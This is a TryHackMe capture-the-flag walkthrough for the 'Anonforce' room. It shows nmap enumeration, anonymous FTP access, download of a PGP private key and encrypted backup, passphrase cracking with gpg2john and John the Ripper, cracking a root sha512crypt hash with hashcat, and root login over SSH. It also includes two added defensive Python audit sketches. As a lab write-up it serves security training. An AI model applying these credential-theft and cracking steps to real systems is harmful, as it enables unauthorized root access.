Try Hack Me - Anonforce

boot2root machine for FIT and bsides guatemala CTF


Howdy my fellow Cyber Enthusiasts! Welcome to another room that Try Hack Me offers! So let's dive in! 😄 You can click on the "Start AttackBox" button to get a Linux machine on the right side of your page, so you can follow this walkthrough.

Let's start with a basic Nmap scan to enumerate the target.

$ IP=10.112.130.247

$ sudo nmap -sV -p- $IP
[sudo] password for [redacted]: 
Starting Nmap 7.99 ( https://nmap.org ) at 2026-05-11 19:25 +0300
Nmap scan report for 10.112.130.247
Host is up (0.049s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.92 seconds

We notice that there is an FTP server running.

21/tcp open  ftp     vsftpd 3.0.3

Let's try to connect to it as an anonymous user.

$ ftp anonymous@$IP

Connected to 10.112.130.247.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

There is no need for a password. Gotcha! 😄 Let's navigate around the server.

ftp> cd home
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||33921|)
150 Here comes the directory listing.
drwxr-xr-x    4 1000     1000         4096 Aug 11  2019 melodias
226 Directory send OK.
ftp> cd melodias
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||13728|)
150 Here comes the directory listing.
-rw-rw-r--    1 1000     1000           33 Aug 11  2019 user.txt
226 Directory send OK.
ftp> get user.txt
local: user.txt remote: user.txt
229 Entering Extended Passive Mode (|||60632|)
150 Opening BINARY mode data connection for user.txt (33 bytes).
100% |*********************************|    33      213.42 KiB/s    00:00 ETA
226 Transfer complete.
33 bytes received in 00:00 (0.70 KiB/s)

💡 user.txt

$ cat user.txt
[redacted]

💡 root.txt

ftp> ls 
229 Entering Extended Passive Mode (|||22917|)
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Aug 11  2019 bin
drwxr-xr-x    3 0        0            4096 Aug 11  2019 boot
drwxr-xr-x   17 0        0            3700 May 11 08:43 dev
drwxr-xr-x   85 0        0            4096 Aug 13  2019 etc
drwxr-xr-x    3 0        0            4096 Aug 11  2019 home
lrwxrwxrwx    1 0        0              33 Aug 11  2019 initrd.img -> boot/initrd.img-4.4.0-157-generic
lrwxrwxrwx    1 0        0              33 Aug 11  2019 initrd.img.old -> boot/initrd.img-4.4.0-142-generic
drwxr-xr-x   19 0        0            4096 Aug 11  2019 lib
drwxr-xr-x    2 0        0            4096 Aug 11  2019 lib64
drwx------    2 0        0           16384 Aug 11  2019 lost+found
drwxr-xr-x    4 0        0            4096 Aug 11  2019 media
drwxr-xr-x    2 0        0            4096 Feb 26  2019 mnt
drwxrwxrwx    2 1000     1000         4096 Aug 11  2019 notread
drwxr-xr-x    2 0        0            4096 Aug 11  2019 opt
dr-xr-xr-x   84 0        0               0 May 11 08:43 proc
drwx------    3 0        0            4096 Aug 11  2019 root
drwxr-xr-x   18 0        0             540 May 11 08:43 run
drwxr-xr-x    2 0        0           12288 Aug 11  2019 sbin
drwxr-xr-x    3 0        0            4096 Aug 11  2019 srv
dr-xr-xr-x   13 0        0               0 May 11 08:43 sys
drwxrwxrwt    9 0        0            4096 May 11 09:17 tmp
drwxr-xr-x   10 0        0            4096 Aug 11  2019 usr
drwxr-xr-x   11 0        0            4096 Aug 11  2019 var
lrwxrwxrwx    1 0        0              30 Aug 11  2019 vmlinuz -> boot/vmlinuz-4.4.0-157-generic
lrwxrwxrwx    1 0        0              30 Aug 11  2019 vmlinuz.old -> boot/vmlinuz-4.4.0-142-generic
226 Directory send OK.

There is an interesting directory in /:

drwxrwxrwx    2 1000     1000         4096 Aug 11  2019 notread
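
Why notread stands out while tmp does not: the sketch below is an added example, not part of the original walkthrough, that parses the `ls -l` style lines an FTP server returns and flags risky permission bits. The listing lines are copied from this page; the function names and the `KEY_SUFFIXES` watch list are assumptions made for illustration.

```python
# Added example: flag risky entries in a Unix-style FTP LIST listing.

# Lines copied from the two listings shown in this walkthrough (subset).
ROOT_LISTING = """\
drwxr-xr-x   85 0        0            4096 Aug 13  2019 etc
drwxrwxrwx    2 1000     1000         4096 Aug 11  2019 notread
drwx------    3 0        0            4096 Aug 11  2019 root
drwxrwxrwt    9 0        0            4096 May 11 09:17 tmp
lrwxrwxrwx    1 0        0              30 Aug 11  2019 vmlinuz -> boot/vmlinuz-4.4.0-157-generic
"""
NOTREAD_LISTING = """\
drwxrwxrwx    2 1000     1000         4096 Aug 11  2019 .
-rwxrwxrwx    1 1000     1000          524 Aug 11  2019 backup.pgp
-rwxrwxrwx    1 1000     1000         3762 Aug 11  2019 private.asc
"""
KEY_SUFFIXES = (".asc", ".pgp", ".gpg", ".key", ".pem")  # assumed watch list

def parse_entry(line):
    """Split one `ls -l` style line into (mode, name); None for other lines."""
    parts = line.split(None, 8)
    if len(parts) < 9 or len(parts[0]) != 10:
        return None  # FTP status lines such as "226 Directory send OK."
    return parts[0], parts[8].partition(" -> ")[0]  # drop symlink target

def audit(listing):
    """Return a list of (name, finding) tuples for one listing."""
    findings = []
    for line in listing.splitlines():
        entry = parse_entry(line)
        if entry is None or entry[0][0] == "l" or entry[1] in (".", ".."):
            continue  # symlink mode bits are not enforced; skip dot entries
        mode, name = entry
        other_r, other_w, other_x = mode[7], mode[8], mode[9]
        if mode[0] == "d" and other_w == "w" and other_x not in "tT":
            # Anyone may create, rename or delete entries here (unlike /tmp).
            findings.append((name, "world-writable directory, no sticky bit"))
        if mode[0] == "-" and other_w == "w":
            findings.append((name, "world-writable file"))
        if mode[0] == "-" and other_r == "r" and name.endswith(KEY_SUFFIXES):
            findings.append((name, "key material readable by everyone"))
    return findings

if __name__ == "__main__":
    for name, finding in audit(ROOT_LISTING) + audit(NOTREAD_LISTING):
        print(f"{name}: {finding}")
```

The same check can be run on the host itself against `ls -l` output, since the FTP server returns that format unchanged.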

Let's have a look inside notread. Nice, we have found two interesting files.

ftp> ls -la
229 Entering Extended Passive Mode (|||46631|)
150 Here comes the directory listing.
drwxrwxrwx    2 1000     1000         4096 Aug 11  2019 .
drwxr-xr-x   23 0        0            4096 Aug 11  2019 ..
-rwxrwxrwx    1 1000     1000          524 Aug 11  2019 backup.pgp
-rwxrwxrwx    1 1000     1000         3762 Aug 11  2019 private.asc
226 Directory send OK.
ftp> get backup.pgp
local: backup.pgp remote: backup.pgp
229 Entering Extended Passive Mode (|||6239|)
150 Opening BINARY mode data connection for backup.pgp (524 bytes).
100% |*********************************|   524      546.70 KiB/s    00:00 ETA
226 Transfer complete.
524 bytes received in 00:00 (11.02 KiB/s)
ftp> get private.asc
local: private.asc remote: private.asc
229 Entering Extended Passive Mode (|||35226|)
150 Opening BINARY mode data connection for private.asc (3762 bytes).
100% |*********************************|  3762        3.23 MiB/s    00:00 ETA
226 Transfer complete.
3762 bytes received in 00:00 (79.05 KiB/s)

💡 gpg2john (sometimes written informally as “gpgp2john”) is a utility included with John the Ripper that extracts password-protected metadata from GNU Privacy Guard (.gpg / .pgp) files and converts it into a hash format that John the Ripper can analyze.

$ gpg2john private.asc > hash.txt

File private.asc

$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
No password hashes left to crack (see FAQ)

$ john --show hash.txt
[redacted]

Now we can import the key using the following command.

$ gpg --import private.asc
gpg: key B92CD1F280AD82C2: "anonforce <[email protected]>" not changed
gpg: key B92CD1F280AD82C2: secret key imported
gpg: key B92CD1F280AD82C2: "anonforce <[email protected]>" not changed
gpg: Total number processed: 2
gpg:              unchanged: 2
gpg:       secret keys read: 1
gpg:  secret keys unchanged: 1

Next, we can decrypt it using the following command.

$ gpg --decrypt backup.pgp
gpg: encrypted with elg512 key, ID AA6268D1E6612967, created 2019-08-12
      "anonforce <[email protected]>"
gpg: WARNING: cipher algorithm CAST5 not found in recipient preferences

root:[redacted]:18120:0:99999:7:::

Now, copy and paste the hash into a file called root.hash.

We will use hashcat to crack the hash.

$ hashcat -m 1800 root.hash /usr/share/wordlists/rockyou.txt

💡 Hashcat is a high-performance password recovery and security auditing tool designed to crack password hashes using CPUs, GPUs, and other hardware accelerators.
It supports hundreds of hash formats and is widely used by penetration testers, forensic analysts, and security researchers to:
- Audit password strength
- Recover lost passwords
- Test authentication security
- Benchmark hash resistance

💡 We are using mode 1800: sha512crypt $6$, SHA512 (Unix).

For more information visit the following website.

https://hashcat.net/wiki/doku.php?id=example_hashes
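
How the decrypted entry maps to mode 1800: the sketch below is an added example, not part of the original walkthrough, that decodes the colon-separated fields of a shadow line the way a password-policy audit would. The sample line is constructed (placeholder salt and digest, same layout as the entry above), and the function name, the `WEAK` policy set and the 99999 "never expires" convention are assumptions.

```python
# Added example: decode one /etc/shadow entry for a password-policy audit.
from datetime import date, timedelta

# Constructed sample with the same layout as the entry above; the salt and
# digest are placeholders, not a real hash.
SAMPLE = "root:$6$CONSTRUCTEDSALT$CONSTRUCTEDDIGEST:18120:0:99999:7:::"

# crypt(3) identifiers -> (scheme name, hashcat mode from example_hashes).
SCHEMES = {"1": ("md5crypt", 500), "5": ("sha256crypt", 7400),
           "6": ("sha512crypt", 1800)}
WEAK = {"md5crypt"}  # assumed policy: schemes an audit should flag

def parse_shadow(line):
    """Return a dict describing one shadow(5) line."""
    fields = line.strip().split(":")
    if len(fields) != 9:
        raise ValueError("shadow entries have 9 colon-separated fields")
    user, pw, lastchg, _min, maxage = fields[:5]
    locked = pw.startswith(("!", "*"))
    body = pw.lstrip("!")  # a locked account may still carry a hash
    scheme, mode, rounds = None, None, None
    if body.startswith("$"):
        parts = body.split("$")  # ['', id, (rounds=N,) salt, digest]
        scheme, mode = SCHEMES.get(parts[1], ("unknown", None))
        if len(parts) > 2 and parts[2].startswith("rounds="):
            rounds = int(parts[2][len("rounds="):])
    # Field 3 counts days since 1970-01-01.
    changed = date(1970, 1, 1) + timedelta(days=int(lastchg)) if lastchg else None
    return {
        "user": user, "locked": locked, "empty_password": pw == "",
        "scheme": scheme, "hashcat_mode": mode,
        "rounds": rounds,  # None means the scheme default (5000 for sha-crypt)
        "last_changed": changed,
        "never_expires": maxage in ("", "99999"),
        "weak_scheme": scheme in WEAK,
    }

if __name__ == "__main__":
    for key, value in parse_shadow(SAMPLE).items():
        print(f"{key}: {value}")
```

The last-change field 18120 decodes to 2019-08-12, the same date gpg reports for the encryption key.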

Finally, connect using SSH.

$ ssh root@$IP
The authenticity of host '10.112.130.247 (10.112.130.247)' can't be established.

root@ubuntu:~# cat root.txt
[redacted]

Congratulations! You have solved this room! 🎉 🎉 🎉